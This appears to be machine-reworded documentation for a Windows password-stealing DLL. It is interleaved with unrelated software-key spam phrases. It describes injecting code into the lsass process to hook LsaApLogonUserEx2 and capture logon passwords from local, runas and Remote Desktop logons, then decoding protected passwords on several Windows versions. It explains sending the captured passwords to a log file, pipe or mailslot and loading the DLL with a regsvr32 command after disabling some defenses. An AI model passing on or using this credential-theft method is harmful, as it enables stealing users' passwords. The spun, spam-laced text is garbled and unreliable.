windows authentication are ultimately within the lsass method normally, the default module is msv1_0.dll, as well as the important in its export operate LsaApLogonUserEx2,
this process by injecting code in to the lsass procedure hook LsaApLogonUserEx2, intercept passwords . As long as the authentication method,
Microsoft Office 2010 Pro Plus,
LsaApLogonUserEx2 triggers, which include the ipc $, runsa, 3389 Remote Desktop landing.
plan to complete the processing around the unique methods, in 2000,2003, xp, vista on both interception,
Windows 7 Product Key,
in 2000,2003, xp, via UNICODE_STRING.Length huge 8 to bit xor essential, should the password is encoded, then decoded by ntdll.RtlRunDecodeUnicodeString,
vista password by way of the AdvApi32.CredIsProtectedW figure out whether or not the encoded decoding with AdvApi32.CredUnprotectW.
lsass can run your debugger to hang about
:)
======== Interface:
HRESULT WINAPI DllInstall (BOOL bInstall, LPCWSTR pszCmdLine );
This can be the prototype of the perform exported dll, please do not be fooled by the name, this program is green.
this perform does not possess the installation of any motion through the start, to not modify the registry or system files. Just needed to select a consistent interface regsvr32 simply call it.
the very first parameter towards the program is useless,
2nd parameter, specify a file route (observe the UNICODE), the recorded information might be saved to right here (Ansi a).
file route can be like this C: x.log,
Windows 7 X86,
can be as . Pipe your_pipename,
Purchase Windows 7, . Mailslot yourslot,
And that means you publish your own loader to call the dll, to ensure that dll to intercept the password information via the pipe or mailslot sent to your program. Information can be a string (which is Ansi's)
======== Check:
you can actually create your own loader not rush to contact,
Microsoft Office 2010 Standard, being a loader with regsvr32 to check this: (you could must close a number of the energetic defense)
regsvr32 / n / i: c: xxx.log c: pluginWinPswLogger.dll
regular, then regsvr32 pop a prompt success.
this time you are able to swap consumer or lock the computer after which log again in, the process information and facts to become intercepted password down and preserve it to c: xxx.log.
========= Finish